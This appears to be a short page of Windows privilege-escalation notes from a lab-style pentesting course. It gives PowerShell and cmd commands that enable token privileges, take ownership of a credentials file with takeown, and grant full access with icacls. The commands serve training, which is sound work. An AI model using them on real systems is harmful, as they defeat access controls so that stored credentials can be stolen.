EnableAllTokenPrivs#

Github page

.\EnableAllTokenPrivs.ps1

Exploit#

View file privilege

Get-ChildItem -Path 'C:\Department Shares\Private\IT\cred.txt' | Select Fullname,LastWriteTime,Attributes,@{Name="Owner";Expression={ (Get-Acl $_.FullName).Owner }}
cmd /c dir /q 'C:\Department Shares\Private\IT'

Take ownership

takeown /f 'C:\Department Shares\Private\IT\cred.txt'

Grant ourself full access to the file

icacls 'C:\Department Shares\Private\IT\cred.txt' /grant htb-student:F
Backward Server Operators Credential Looting Forward